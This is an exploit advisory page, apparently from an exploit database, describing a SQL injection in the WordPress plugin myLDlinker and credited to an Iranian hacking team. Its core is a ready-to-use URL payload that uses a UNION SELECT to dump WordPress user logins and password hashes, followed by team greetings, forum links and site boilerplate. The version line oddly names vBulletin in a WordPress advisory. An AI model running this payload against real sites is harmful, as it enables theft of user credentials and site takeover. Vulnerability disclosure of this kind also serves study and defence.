WordPress 3.0.1 plugin myLDlinker ( SQL Injection Vulnerability )

2010-10-20 / 2010-10-21
Credit: Ajax Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################### [+] Exploit Title: WordPress 3.0.1 plugin myLDlinker ( SQL Injection Vulnerability ) [+] Author: Ajax Security Team [+] Version: vBulletin [ 2.9 - 3.0.1 ] [+] Tested on: WordPress 3.0.1 plugin myLDlinker ################################################################# ###########################[ Exploit ]########################### [ Exploit ] { myLDlinker.php?url=[SQL] } Http://target.com/myLDlinker.php?url=-255 union select group_concat(user_login,0x3a,user_pass) from wp-users-- [ / Exploit ] ###########################[ Exploit ]########################### Video : http://ajaxtm.com/forum/up/wp%28ajaxtm.com%29.rar References : http://www.ajaxtm.com/forum/آمورش-های-تصویری-تیم/130-باگ-جدید-در-پلاگین-ورد-پرس.html ################################################################# BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ajaxtm.com Forum : Http://Ajaxtm.com/forum/ [+] Greetz to All Ajaxtm Security Member HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook - S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A #################################################################

References:

http://ajaxtm.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top